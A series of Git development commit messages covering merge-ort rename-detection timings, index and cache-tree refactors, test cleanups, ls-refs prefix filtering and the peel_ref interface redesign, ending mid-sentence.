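re-run figures quoted above; the dictionary layout and function name are
assumptions for illustration, and the numbers are copied as reported.

```python
# (overall seconds, "everything else" seconds) from the single re-run.
RERUN = {
    ("no-renames", "merge-recursive"): (19.302, 11.699),
    ("no-renames", "merge-ort"): (14.257, 6.351),
    ("mega-renames", "merge-recursive"): (5950.195, 203.886),
    ("mega-renames", "merge-ort"): (5499.672, 17.552),
    ("just-one-mega", "merge-recursive"): (151.001, 7.553),
    ("just-one-mega", "merge-ort"): (158.582, 0.747),
}


def max_speedup(overall: float, everything_else: float) -> float:
    """Upper bound on speedup if rename detection cost dropped to zero."""
    return overall / everything_else


for (testcase, backend), (overall, rest) in RERUN.items():
    print(f"{testcase:14} {backend:16} {max_speedup(overall, rest):8.1f}x")
```

Even the no-renames case leaves room for a speedup of more than 1.5x,
and just-one-mega with merge-ort leaves room for more than 200x.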
1) no-renames
1a) merge-ort is faster than merge-recursive, which is nice. However,
this still should not be considered good enough. Although the "merge"
backend to rebase (merge-recursive) is sometimes faster than the "apply"
backend, this is one of those cases where it is not. In fact, even
merge-ort is slower. The "apply" backend can complete this testcase in
6.940 s ± 0.485 s
which is about 2x faster than merge-ort and 3x faster than
merge-recursive. One goal of the merge-ort performance work will be to
make it faster than git-am on this (and similar) testcases.
2) mega-renames
2a) Obviously rename detection is a huge cost; it's where most of the time
is spent. We need to cut that down. If we could somehow infinitely
parallelize it and drive its time to 0, the merge-recursive time would
drop to about 204s, and the merge-ort time would drop to about 17s. I
think this particular stat shows I've subtly baked a couple performance
improvements into merge-ort and into fast-rebase already.
3) just-one-mega
3a) not much to say here, it just gives some flavor for how rebasing
only one patch compares to rebasing 35.
=== Goals ===
This patch is obviously just the beginning. Here are some of my goals
that this measurement will help us achieve:
* Drive the cost of rename detection down considerably for merges
* After the above has been achieved, see if there are other slowness
factors (which would have previously been overshadowed by rename
detection costs) which we can then focus on and also optimize.
* Ensure our rebase testcase that requires little rename detection
is noticeably faster with merge-ort than with apply-based rebase.
Signed-off-by: Elijah Newren <newren@gmail.com>
Acked-by: Taylor Blau <ttaylorr@github.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
get_provisional_directory_renames() has code to detect directories being
evenly split between different locations. However, as noted previously,
if there are no new files added to that directory that was split evenly,
our inability to determine where the directory was renamed to doesn't
matter since there are no new files to try to move into the new
location. Unfortunately, that code is unaware of whether there are new
files under the directory in question and we just ignore that, causing
us to fail t6423 test 2b but pass test 2a; turn off the error for now,
swapping which tests pass and fail.
The motivating reason for switching this off as a temporary measure is
that as we add optimizations, we'll start looking at only subsets of
renames, and subsets of renames can start switching the result we get
when this error is (wrongly) on. Once we get enough optimizations,
however, we can prevent that code from even running when there are no
new files added to the relevant directory, at which point we can revert
this commit and then both testcases 2a and 2b will pass simultaneously.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a series of merges was performed (such as for a rebase or series of
cherry-picks), only the data structures allocated by the final merge
operation were being freed. The problem was that while picking out
pieces of merge-ort to upstream, I previously misread a certain section
of merge_start() and assumed it was associated with a later
optimization. Include that section now, which ensures that if there was
a previous merge operation, that we clear out result->priv and then
re-use it for opt->priv, and otherwise we allocate opt->priv.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove support for using version 1 of the PCRE library. Its use has
been discouraged by upstream for a long time, and it's in a
bugfix-only state.
Anyone who was relying on v1 in particular got a nudge to move to v2
in e6c531b808 (Makefile: make USE_LIBPCRE=YesPlease mean v2, not v1,
2018-03-11), which was first released as part of v2.18.0.
With this the LIBPCRE2 test prerequisite is redundant with PCRE. But
I'm keeping it for self-documentation purposes, and to avoid conflict
with other in-flight PCRE patches.
I'm also not changing all of our own "pcre2" names to "pcre", i.e. the
inverse of 6d4b5747f0 (grep: change internal *pcre* variable &
function names to be *pcre1*, 2017-05-25). I don't see the point, and
it makes the history/blame harder to read. Maybe if there's ever a
PCRE v3...
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a flag added in my fb95e2e38d (grep: un-break building with
PCRE >= 8.32 without --enable-jit, 2017-06-01). It's set just below
USE_LIBPCRE=YesPlease, so it's been redundant since
e6c531b808 (Makefile: make USE_LIBPCRE=YesPlease mean v2, not v1,
2018-03-11).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These also document some behaviors that differ from a full checkout, and
possibly in a way that is not intended.
The test is designed to be run with "--run=1,X" where 'X' is an
interesting test case. Each test uses 'init_repos' to reset the full and
sparse copies of the initial-repo that is created by the first test
case. This also makes it possible to have test cases leave the working
directory or index in unusual states without disturbing later cases.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
From ff15d509b89edd4830d85d53cea3079a6b0c1c08 Mon Sep 17 00:00:00 2001
From: Derrick Stolee <dstolee@microsoft.com>
Date: Mon, 11 Jan 2021 08:53:09 -0500
Subject: [PATCH 8/9] test-lib: test_region looks for trace2 regions
Most test cases can verify Git's behavior using input/output
expectations or changes to the .git directory. However, sometimes we
want to check that Git did or did not run a certain section of code.
This is particularly important for performance-only features that we
want to ensure have been enabled in certain cases.
Add a new 'test_region' function that checks if a trace2 region was
entered and left in a given trace2 event log.
There is one existing test (t0500-progress-display.sh) that performs
this check already, so use the helper function instead. Note that this
changes the expectations slightly. The old test (incorrectly) used two
patterns for the 'grep' invocation, but this performs an OR of the
patterns, not an AND. This means that as long as one region_enter event
was logged, the test would succeed, even if it was not due to the
progress category.
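The difference between the OR and the AND semantics can be shown with a
small Python model of a trace2 event log. This is a sketch, not the
shell helper added by the patch: the function names are hypothetical,
the two substrings in old_or_check() only approximate the old grep
patterns, and the "event", "category" and "label" field names are taken
from the trace2 event format as I understand it.

```python
import json


def region_seen(trace_lines, event, category, label):
    """True if one event line matches event, category and label together."""
    for line in trace_lines:
        record = json.loads(line)
        if (
            record.get("event") == event
            and record.get("category") == category
            and record.get("label") == label
        ):
            return True
    return False


def check_region(trace_lines, category, label):
    """The region must have been both entered and left."""
    return region_seen(trace_lines, "region_enter", category, label) and region_seen(
        trace_lines, "region_leave", category, label
    )


def old_or_check(trace_lines, category):
    """Two grep patterns: a line matching either one is enough."""
    needle = f'"category":"{category}"'
    return any("region_enter" in line or needle in line for line in trace_lines)
```

A log that contains only an unrelated region satisfies old_or_check()
for the "progress" category but fails check_region(), which is the
change in expectations described above.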
More uses will be added in a later change.
t6423-merge-rename-directories.sh also greps for region_enter lines, but
it verifies the number of such lines, which is not the same as an
existence check.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A future feature will want to load the sparse-checkout patterns into a
pattern_list, but the current mechanism to do so is a bit complicated.
This is made difficult due to needing to find the sparse-checkout file
in different ways throughout the codebase.
The logic implemented in the new get_sparse_checkout_patterns() was
duplicated in populate_from_existing_patterns() in unpack-trees.c. Use
the new method instead, keeping the logic around handling the struct
unpack_trees_options.
The callers to get_sparse_checkout_filename() in
builtin/sparse-checkout.c manipulate the sparse-checkout file directly,
so it is not appropriate to replace logic in that file with
get_sparse_checkout_patterns().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The lazy_init_name_hash() populates a hashset with all filenames and
another with all directories represented in the index. This is run only
if we need to use the hashsets to check for existence or case-folding
renames.
Place trace2 regions where there is already a performance trace.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It will be helpful to add behavior to index operations that might
trigger an object lookup. Since each index belongs to a specific
repository, add a 'repo' pointer to struct index_state that allows
access to this repository.
Add a BUG() statement if the repo already has an index, and the index
already has a repo, but somehow the index points to a different repo.
This will prevent future changes from needing to pass an additional
'struct repository *repo' parameter and instead rely only on the 'struct
index_state *istate' parameter.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index has an fsmonitor_dirty bitmap that records which index entries
are "dirty" based on the response from the FSMonitor. If this bitmap
ever grows larger than the index, then there was an error in how it was
constructed, and it was probably a developer's bug.
There are several BUG() statements that are very similar, so replace
these uses with a simpler assert_index_minimum(). Since there is one
caller that uses a custom 'pos' value instead of the bit_size member, we
cannot simplify it too much. However, the error string is identical in
each, so this simplifies things.
Be sure to add one when checking if a position is valid, since the
minimum is a bound on the expected size.
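The off-by-one can be seen in a tiny model. The name
assert_index_minimum() comes from the patch, but the signature, the
check_position() wrapper, and the message below are assumptions for
illustration.

```python
def assert_index_minimum(cache_nr: int, minimum: int) -> None:
    """Fail if the index holds fewer than 'minimum' entries."""
    if minimum > cache_nr:
        raise AssertionError(
            f"fsmonitor_dirty has more entries than the index ({minimum} > {cache_nr})"
        )


def check_position(cache_nr: int, pos: int) -> None:
    # Position 'pos' exists only if the index has at least pos + 1 entries.
    assert_index_minimum(cache_nr, pos + 1)
```

Passing a bit_size directly needs no adjustment, since it is already a
size rather than a position.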
The end result is that the code is simpler to read while also preserving
these assertions for developers in the FSMonitor space.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This method will be helpful to use outside of cache-tree.c in a later
feature. The implementation is subtle due to subtree_name_cmp() sorting
by length and then lexicographically.
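To make the ordering concrete, here is a minimal sketch of a "length first, then bytes" comparison. The name name_cmp_by_length() is made up for this illustration; it is meant to mirror the ordering described above, not to reproduce the code in cache-tree.c.

```c
#include <string.h>

/*
 * Compare two names by length first; only names of equal length are
 * compared byte by byte. Returns <0, 0 or >0 like memcmp().
 */
int name_cmp_by_length(const char *one, size_t onelen,
		       const char *two, size_t twolen)
{
	if (onelen < twolen)
		return -1;
	if (twolen < onelen)
		return 1;
	return memcmp(one, two, onelen);
}
```

Under this ordering "z" sorts before "aa", which is the opposite of what strcmp() would say. Any binary search over such a list has to use the same comparison.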
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The verify_cache() method takes an array of cache entries and a count,
but these are always provided directly from a struct index_state. Use
a pointer to the full structure instead.
There is a subtle point when istate->cache_nr is zero that subtracting
one will underflow. This triggers a failure in t0000-basic.sh, among
others. Use "i + 1 < istate->cache_nr" to avoid these strange
comparisons. Convert i to be unsigned as well, which also removes the
potential signed overflow in the unlikely case that cache_nr is over 2.1
billion entries. The 'funny' variable has a maximum value of 11, so
making it unsigned does not change anything of importance.
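The loop-bound issue can be shown in isolation. The sketch below is not verify_cache() itself; count_adjacent_duplicates() is a hypothetical helper that walks neighbouring pairs of a sorted array, which is the same access pattern.

```c
#include <stddef.h>
#include <string.h>

/* Count neighbouring entries with identical names in a sorted array. */
size_t count_adjacent_duplicates(const char **names, size_t nr)
{
	size_t i, dups = 0;

	/*
	 * Writing "i < nr - 1" would wrap around to a huge value when
	 * nr == 0 and read far past the array. "i + 1 < nr" is safe
	 * for every nr, including zero.
	 */
	for (i = 0; i + 1 < nr; i++)
		if (!strcmp(names[i], names[i + 1]))
			dups++;
	return dups;
}
```

With an unsigned counter and the "i + 1 < nr" form, an empty array simply skips the loop.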
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make the method safer by allocating a cache_tree member for the given
index_state if it is not already present. This is preferable to a
BUG() statement or returning with an error because future callers will
want to populate an empty cache-tree using this method.
Callers can also remove their conditional allocations of cache_tree.
Also drop local variables that can be found directly from the 'istate'
parameter.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test initially added in 50cd31c652 (t3600: comment on
inducing SIGPIPE in `git rm`, 2019-11-27) to explicitly test for
SIGPIPE using a pattern initially established in 7559a1be8a (unblock
and unignore SIGPIPE, 2014-09-18).
The problem with using that pattern is that it requires us to skip the
test on MINGW[1]. If we kept the test with its initial semantics[2]
we'd get coverage there, at the cost of not checking whether we
actually had SIGPIPE outside of MinGW.
Arguably we should just remove this test. Between the test added in
7559a1be8a and the change made in 12e0437f23 (common-main: call
restore_sigpipe_to_default(), 2016-07-01) it's a bit arbitrary to only
check this for "git rm".
But in lieu of having wider test coverage for other "git" subcommands
let's refactor this to explicitly test for SIGPIPE outside of MinGW,
and then just check that we remove the ".git/index.lock" (as before) on all
platforms.
1. https://lore.kernel.org/git/xmqq1rec5ckf.fsf@gitster.c.googlers.com/
2. 0693f9ddad (Make sure lockfiles are unlocked when dying on SIGPIPE,
2008-12-18)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change an invocation of zipinfo added in 19ee29401d (t5004: test ZIP
archives with many entries, 2015-08-22) to simply ask zipinfo for the
header info, rather than spewing out info about the entire archive and
race to kill it with SIGPIPE due to the downstream "head -2".
I ran across this because I'm adding a "set -o pipefail" test
mode. This won't be needed for the version of the mode that I'm
introducing (which currently relies on a patch to GNU bash), but I
think this is a good idea anyway.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Continue changing a test that 763b47bafa (t5703: stop losing return
codes of git commands, 2019-11-27) already refactored.
This was originally added as part of a series to add support for
running under bash's "set -o pipefail". Under that mode this test will
fail because sometimes there are no commits in the "objs" output.
It's easier to fix that than exempt these tests under a hypothetical
"set -o pipefail" test mode. It looks like we probably won't have
that, but once we've dug this code up let's refactor it[1] so we don't
hide a potential pipe failure.
1. https://lore.kernel.org/git/xmqqzh18o8o6.fsf@gitster.c.googlers.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rewrite brittle tests which used "rev-list" without "--[no-]merges"
to figure out if a set of commits turned into merge commits or not.
Signed-off-by: Jeff King <peff@peff.net>
[ÆAB: wrote commit message]
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor some old-style test code to use test_must_be_empty instead of
"test -z". This makes a follow-up commit easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use "<file" instead of "< file", and don't put the closing quote for
strings on an indented line. This makes a follow-up refactoring commit
easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test code added in 9c4d6c0297 (cache-tree: Write updated
cache-tree after commit, 2014-07-13) used "ls-files" in lieu of
"ls-tree" because it wanted to test the data in the index, since this
test is testing the cache-tree extension.
Change the test to instead use "ls-tree" for traversal, and then
explicitly check how HEAD differs from the index. This is more easily
understood, and less fragile as numerous past bug fixes[1][2][3] to
the old code we're replacing demonstrate.
As an aside this would be a bit easier if empty pathspecs hadn't been
made an error in d426430e6e (pathspec: warn on empty strings as
pathspec, 2016-06-22) and 9e4e8a64c2 (pathspec: die on empty strings
as pathspec, 2017-06-06).
If that were still allowed this code could be simplified slightly:
diff --git a/t/t0090-cache-tree.sh b/t/t0090-cache-tree.sh
index 9bf66c9e68..0b02881f55 100755
--- a/t/t0090-cache-tree.sh
+++ b/t/t0090-cache-tree.sh
@@ -18,19 +18,18 @@ cmp_cache_tree () {
# test-tool dump-cache-tree already verifies that all existing data is
# correct.
generate_expected_cache_tree () {
- pathspec="$1" &&
- dir="$2${2:+/}" &&
+ pathspec="$1${1:+/}" &&
git ls-tree --name-only HEAD -- "$pathspec" >files &&
git ls-tree --name-only -d HEAD -- "$pathspec" >subtrees &&
- printf "SHA %s (%d entries, %d subtrees)\n" "$dir" $(wc -l <files) $(wc -l <subtrees) &&
+ printf "SHA %s (%d entries, %d subtrees)\n" "$pathspec" $(wc -l <files) $(wc -l <subtrees) &&
while read subtree
do
- generate_expected_cache_tree "$pathspec/$subtree/" "$subtree" || return 1
+ generate_expected_cache_tree "$subtree" || return 1
done <subtrees
}
test_cache_tree () {
- generate_expected_cache_tree "." >expect &&
+ generate_expected_cache_tree >expect &&
cmp_cache_tree expect &&
rm expect actual files subtrees &&
git status --porcelain -- ':!status' ':!expected.status' >status &&
1. c8db708d5d (t0090: avoid passing empty string to printf %d,
2014-09-30)
2. d69360c6b1 (t0090: tweak awk statement for Solaris
/usr/xpg4/bin/awk, 2014-12-22)
3. 9b5a9fa60a (t0090: stop losing return codes of git commands,
2019-11-27)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the $2 parameter. This appears to have been some
work-in-progress code from an earlier version of
9c4d6c0297 (cache-tree: Write updated cache-tree after commit,
2014-07-13) which was left in the final version.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the cache-tree test file to use our current recommended
patterns. This makes a subsequent meaningful change easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During a merge conflict, the name of a file may appear multiple
times in "git ls-files" output, once for each stage. If you use
both `--deleted` and `--modified` at the same time, the output may
mention a deleted file twice.
When none of the '-t', '-u', or '-s' options is in use, these
duplicate entries do not add much value to the output.
Introduce a new '--deduplicate' option to suppress them.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: extended doc and rewritten commit log]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will make it easier to show only one entry per filename in the
next step.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: corrected the log message]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the original code, lstat() may fail, yet we still pass `&st` to
ie_modified() afterwards, even though its contents are not meaningful.
When lstat() has failed, call show_ce() directly and skip the
ie_modified() check.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
[jc: fixed misindented code]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
ls-refs performs a single revision walk over the whole ref namespace,
and sends ones that match with one of the given ref prefixes down to the
user.
This can be expensive if there are many refs overall, but the portion of
them covered by the given prefixes is small by comparison.
To attempt to reduce the difference between the number of refs
traversed, and the number of refs sent, only traverse references which
are in the longest common prefix of the given prefixes. This is very
reminiscent of the approach taken in b31e2680c4 (ref-filter.c: find
disjoint pattern prefixes, 2019-06-26) which does an analogous thing for
multi-patterned 'git for-each-ref' invocations.
The 'send_ref' callback tolerates the extra refs this may visit: it
discards any ref which does not begin with at least one of the
specified prefixes.
Similarly, the code introduced in b31e2680c4 is resilient to stop early
at metacharacters, but we only pass strict prefixes here. At worst we
would return too many results, but the double checking done by send_ref
will throw away anything that doesn't start with something in the prefix
list.
Finally, if no prefixes were provided, then implicitly add the empty
string (which will match all references) since this matches the existing
behavior (see the "no restrictions" comment in "ls-refs.c:ref_match()").
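A simplified sketch of the two halves of this scheme follows: narrowing the traversal to a common prefix, then double checking each ref. The function names are hypothetical, and this models the description above rather than the exact prefix computation in the patch.

```c
#include <stddef.h>
#include <string.h>

/*
 * Length of the longest prefix shared by all `nr` strings. With no
 * prefixes at all the result is 0, i.e. the empty prefix that matches
 * every ref.
 */
size_t longest_common_prefix_len(const char **prefixes, size_t nr)
{
	size_t i, len;

	if (!nr)
		return 0;
	len = strlen(prefixes[0]);
	for (i = 1; i < nr; i++) {
		size_t j = 0;

		while (j < len && prefixes[i][j] == prefixes[0][j])
			j++;
		len = j;
	}
	return len;
}

/* Per-ref double check: does `refname` start with any requested prefix? */
int matches_any_prefix(const char *refname, const char **prefixes, size_t nr)
{
	size_t i;

	if (!nr)
		return 1;	/* no restrictions */
	for (i = 0; i < nr; i++)
		if (!strncmp(refname, prefixes[i], strlen(prefixes[i])))
			return 1;
	return 0;
}
```

For the prefixes "refs/heads/" and "refs/tags/" the traversal would be limited to "refs/", and a ref such as "refs/pull/1" seen along the way would be thrown away by the second check.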
Original-patch-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Correctly initialize the "prefixes" strvec using strvec_init() instead
of simply zeroing it via the earlier memset().
There's no way to trigger a crash, since the first 'ref-prefix' command
will initialize the strvec via the 'ALLOC_GROW' in 'strvec_push_nodup()'
(the alloc and nr variables are already zero'd, so the call to
ALLOC_GROW is valid).
If no "ref-prefix" command was given, then the call to
'ls-refs.c:ref_match()' will abort early after it reads the zero in
'prefixes->nr'. Likewise, strvec_clear() will only call free() on the
array, which is NULL, so we're safe there, too.
But, all of this is dangerous and requires more reasoning than it would
if we simply called 'strvec_init()', so do that.
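The difference between a zeroed struct and an initialized one can be sketched with a toy vector. The toy_strvec type and its helpers are hypothetical, and the sketch assumes an init function that points the array at a shared, NULL-terminated empty list.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified stand-in for a string vector. */
struct toy_strvec {
	const char **v;
	size_t nr;
	size_t alloc;
};

/* Shared, always NULL-terminated empty array. */
static const char *toy_empty[] = { NULL };

void toy_strvec_init(struct toy_strvec *sv)
{
	sv->v = toy_empty;
	sv->nr = 0;
	sv->alloc = 0;
}

/* Count entries by walking to the terminating NULL, as argv-style code does. */
size_t toy_count_until_null(const struct toy_strvec *sv)
{
	size_t n = 0;

	while (sv->v[n])
		n++;
	return n;
}
```

After memset() the array pointer itself is NULL, so any code that walks the array instead of checking nr first would dereference NULL. After the init call the same walk is well defined and sees an empty list.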
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function was used in the ref-filter.c code to find the longest
common prefix among a set of refspecs, and then to iterate all of the
references that descend from that prefix.
A future patch will want to use that same code from ls-refs.c, so
prepare by exposing and moving it to refs.c. Since there is nothing
specific to the ref-filter code here (other than that it was previously
the only caller of this function), this really belongs in the more
generic refs.h header.
The code moved in this patch is identical before and after, with the one
exception of renaming some arguments to be consistent with other
functions exposed in refs.h.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In git-pack-objects, we iterate over all the tags if the --include-tag
option is passed on the command line. For some reason this uses
for_each_ref which is expensive if the repo has many refs. We should
use for_each_tag_ref instead.
Because the add_ref_tag callback will now only visit tags we
simplified it a bit.
The motivation for this change is that we observed performance issues
with a repository on gitlab.com that has 500,000 refs but only 2,000
tags. The fetch traffic on that repo is dominated by CI, and when we
changed CI to fetch with 'git fetch --no-tags' we saw a dramatic
change in the CPU profile of git-pack-objects. This led us to this
particular ref walk. More details in:
https://gitlab.com/gitlab-com/gl-infra/scalability/-/issues/746#note_483546598
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's unclear how run-command's use_shell option should impact the
arguments fed to a command. Plausibly it could mean that we glue all of
the arguments together into a string to pass to the shell, in which case
that opens the question of whether the caller needs to quote them.
But in fact we don't implement it that way (and even if we did, we'd
probably auto-quote the arguments as part of the glue step). And we must
not receive quoted arguments, because we might actually optimize out the
shell entirely (i.e., the caller does not even know if a shell will be
involved in the end or not).
Since this ambiguity may have been the cause of a recent bug, let's
document the option a bit.
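To illustrate why a caller cannot know whether a shell will be involved, here is a simplified model of the decision. toy_needs_shell() is a hypothetical name and the metacharacter set is an assumption for this sketch, not a statement of the exact list run-command uses.

```c
#include <string.h>

/*
 * Simplified model: a command string needs a real shell only if it
 * contains a shell metacharacter. The character set below is an
 * assumption made for illustration.
 */
int toy_needs_shell(const char *cmd)
{
	return cmd[strcspn(cmd, "|&;<>()$`\\\"' \t\n*?[#~=%")] != '\0';
}
```

Since the same argument list is used whether or not this returns true, the arguments have to be passed as plain, unquoted strings in both cases.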
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add new helper 'test_cmp_refs' to check references in a repository.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
SZEDER reported that t5411 failed in Travis CI's s390x environment a
couple of times, and could be reproduced with '--stress' test on this
specific environment. The test failure messages might look like this:
+ test_cmp expect actual
--- expect 2021-01-17 21:55:23.430750004 +0000
+++ actual 2021-01-17 21:55:23.430750004 +0000
@@ -1 +1 @@
-<COMMIT-A> refs/heads/main
+<COMMIT-A> refs/heads/maifatal: the remote end hung up unexpectedly
error: last command exited with $?=1
not ok 86 - proc-receive: not support push options (builtin protocol)
The file 'actual' is filtered from the file 'out', which contains the
result of the 'git show-ref' command. t5411 failed because error messages
from another process were accidentally written into the file 'out'.
SZEDER found the root cause of this issue:
- 'git push' is executed with its standard output and error redirected
to the file 'out'.
- 'git push' executes 'git receive-pack' internally, which inherits
the open file descriptors, so its output and error go into that
same 'out' file.
- 'git push' ends without waiting for the close of 'git-receive-pack'
in some cases, and the file 'out' is reused for the test of
'git show-ref' afterwards.
- A mixture of the output of 'git show-ref' and 'git receive-pack'
leads to this issue.
The first intuitive reaction to resolve this issue is to remove the
file 'out' after use, so that the newly created file 'out' will have a
different file descriptor and will not be overwritten by the
'git receive-pack' process. But Johannes pointed out that removing an
open file is not possible on Windows. So we use different temporary
file names to store the output of 'git push' to solve this issue.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git tag -d' accepts one or more tag refs to delete, but each deletion
is done by calling `delete_ref` on each argv. This is very slow when
removing from packed refs. Use delete_refs instead so all the removals
can be done inside a single transaction with a single update.
Do the same for 'git branch -d'.
Since delete_refs performs all the packed-refs delete operations
inside a single transaction, if any of the deletes fails then all of
them will be skipped. In practice, none of them should fail since
we verify the hash of each one before calling delete_refs, but some
network error or odd permissions problem could have different results
after this change.
Also, since the file-backed deletions are not performed in the same
transaction, those could succeed even when the packed-refs transaction
fails.
After deleting branches, remove the branch config only if the branch
ref was removed and was not subsequently added back in.
A manual test deleting 24,000 tags took about 30 minutes using
delete_ref. It takes about 5 seconds using delete_refs.
Acked-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Phil Hord <phil.hord@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The peel_ref() interface is confusing and error-prone:
- it's typically used by ref iteration callbacks that have both a
refname and oid. But since they pass only the refname, we may load
the ref value from the filesystem again. This is inefficient, but
also means we are open to a race if somebody simultaneously updates
the ref. E.g., this:
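int some_ref_cb(const char *refname, const struct object_id *oid, ...)
{
	struct object_id peeled;
	/* "oid" came from the iterator; peel_ref() may re-read the ref */
	if (!peel_ref(refname, &peeled))
		printf("%s peels to %s",
		       oid_to_hex(oid), oid_to_hex(&peeled));
	return 0;
}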
could print nonsense. It is correct to say "refname peels to..."
(you may see the "before" value or the "after" value, either of
which is consistent), but mentioning both oids may be mixing
before/after values.
Worse, whether this is possible depends on whether the optimization
to read from the current iterator value kicks in. So it is actually
not possible with:
for_each_ref(some_ref_cb);
but it _is_ possible with:
head_ref(some_ref_cb);
which does not use the iterator mechanism (though in practice, HEAD
should never peel to anything, so this may not be triggerable).
- it must take a fully-qualified refname for the read_ref_full() code
path to work. Yet we routinely pass it partial refnames from
callbacks to for_each_tag_ref(), etc. This happens to work when
iterating because there we do not call read_ref_full() at all, and
only use the passed refname to check if it is the same as the
iterator. But the requirements for the function parameters are quite
unclear.
Instead of taking a refname, let's instead take an oid. That fixes both
problems. It's a little funny for a "ref" function not to involve refs
at all. The key thing is that it's optimizing under the hood based on
having access to the ref iterator. So let's change the name to make it
clear why you'd want this function versus just peel_object().
There are two other directions I considered but rejected:
- we could pass the peel information into the each_ref_fn callback.
However, we don't know if the caller actually wants it or not. For
packed-refs, providing it is essentially free. But for loose refs,
we actually have to peel the object, which would be wasteful in most
cases. We could likewise pass in a flag to the callback indicating
whether the peeled information is known, but that complicates those
callbacks, as they then have to decide whether to manually peel
themselves. Plus it requires changing the interface of every
callback, whether they care about peeling or not, and there are many
of them.
- we could make a function to return the peeled value of the current
iterated ref (computing it if necessary), and BUG() otherwise. I.e.:
int peel_current_iterated_ref(struct object_id *out);
Each of the current callers is an each_ref_fn callback, so they'd
mostly be happy. But:
- we use those callbacks with functions like head_ref(), which do
not use the iteration code. So we'd need to handle the fallback
case there, anyway.
- it's possible that a caller would want to call into generic code
that sometimes is used during iteration and sometimes not. This
encapsulates the logic to do the fast thing when possible, and
fallback when necessary.
The implementation is mostly obvious, but I want to call out a few
things in the patch:
- the test-tool coverage for peel_ref() is now meaningless, as it all
collapses to a single peel_object() call (arguably they were pretty
uninteresting before; the tricky part of that function is the
fast-path we see during iteration, but these calls didn't trigger
that). I've just dropped it entirely, though note that some other
tests relied on the tags we created; I've moved that creation to the
tests where it matters.
- we no longer need to take a ref_store parameter, since we'd never
look up a ref now. We do still rely on a global "current iterator"
variable which _could_ be kept per-ref-store. But in practice this
is only useful if there are multiple recursive iterations, at which
point the more appropriate solution is probably a stack of
iterators. No caller used the actual ref-store parameter anyway
(they all call the wrapper that passes the_repository).
- the original only kicked in the optimization when the "refname"
pointer matched (i.e., not string comparison). We do likewise with
the "oid" parameter here, but fall back to doing an actual oideq()
call. This in theory lets us kick in the optimization more often,
though in practice no current caller cares. It should never be
